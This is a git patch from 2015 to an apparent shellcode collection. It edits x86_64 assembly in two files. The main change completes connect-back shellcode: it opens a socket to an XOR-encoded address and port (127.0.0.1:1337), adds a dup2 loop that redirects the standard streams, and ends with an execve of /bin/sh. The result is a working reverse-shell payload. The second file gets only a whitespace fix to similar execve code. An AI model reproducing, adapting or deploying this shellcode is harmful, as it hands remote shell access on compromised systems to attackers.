From ba60e5853f3c655245229c7abf1a8e25922a127a Mon Sep 17 00:00:00 2001
From: toni <matzeton@googlemail.com>
Date: Wed, 23 Sep 2015 12:39:54 +0200
Subject: x86_64 shellcode + funcjmp_ext

---
 shellcode/connect_x64.asm | 50 ++++++++++++++++++++++++++---------------------
 shellcode/socket_x64.asm  |  2 +-
 2 files changed, 29 insertions(+), 23 deletions(-)

(limited to 'shellcode')

diff --git a/shellcode/connect_x64.asm b/shellcode/connect_x64.asm
index d1e0ef2..829a7fd 100644
--- a/shellcode/connect_x64.asm
+++ b/shellcode/connect_x64.asm
@@ -17,32 +17,38 @@ mov		rdi,rax
 xor		rax,rax
 push		rax
 push		rax
-push            0x1011116E	; XOR-encoded -> 127.0.0.1
-xor dword       [rsp],0x11111111
-push word       0x2814          ; push tcp port (XOR-encoded -> 1337)
-xor word        [rsp],0x1111 ; decode tcp port
-push word       0x2    ; 0x2 -> AF_INET
-mov             rsi,rsp
+push dword	0x1011116E	; XOR-encoded -> 127.0.0.1
+xor dword	[rsp],0x11111111
+push word	0x2814          ; push tcp port (XOR-encoded -> 1337)
+xor word	[rsp],0x1111 ; decode tcp port
+push word	0x2    ; 0x2 -> AF_INET
+mov		rsi,rsp
 mov		dl,0x10
 mov		al,42
 syscall
 
 ; dup2()
-;mov		rbx,rdi
-;xor		rdi,rdi
-;xor		rsi,rsi
-;xor             rcx,rcx         ; zero out count register
-;mov             cl,0x3          ; loopcount
-;dupes:
-;xor             eax,eax         ; zero out eax
-;mov             al,33           ; dup2() syscall
-;dec             cl
-;mov		rdi,rcx
-;mov		rsi,rbx
-;syscall
-;inc             cl
-;loop            dupes
+xor		rdx,rdx
+mov		dl,0x3
+dupes:
+mov		rsi,rdx
+dec		rsi
+xor		rax,rax
+mov		al,0x21
+syscall
+dec		dl
+jnz dupes
 
-; exec()
+; exec
+mov		rax,0x68732f6e69622f2f  ; string 'hs/nib//'
+push		rax
+xor		rax,rax
+mov byte	[rsp + 8],al
+mov		rdi,rsp
+push		rax
+mov		rsi,rsp
+push		rax
+mov		rdx,rsp
+mov		al,0x3b
+syscall
 
-; exit()
diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm
index 1ec36b0..885c0fd 100644
--- a/shellcode/socket_x64.asm
+++ b/shellcode/socket_x64.asm
@@ -57,7 +57,7 @@ jnz dupes
 mov		rax,0x68732f6e69622f2f	; string 'hs/nib//'
 push		rax			; push the string onto the stack
 xor		rax,rax
-mov byte        [rsp + 8],al            ; null-terminate the string
+mov byte        [rsp + 8],al		; null-terminate the string
 mov		rdi,rsp			; arg1 = pointer to string
 push		rax			; arg2 = null
 mov		rsi,rsp
-- 
cgit v1.2.3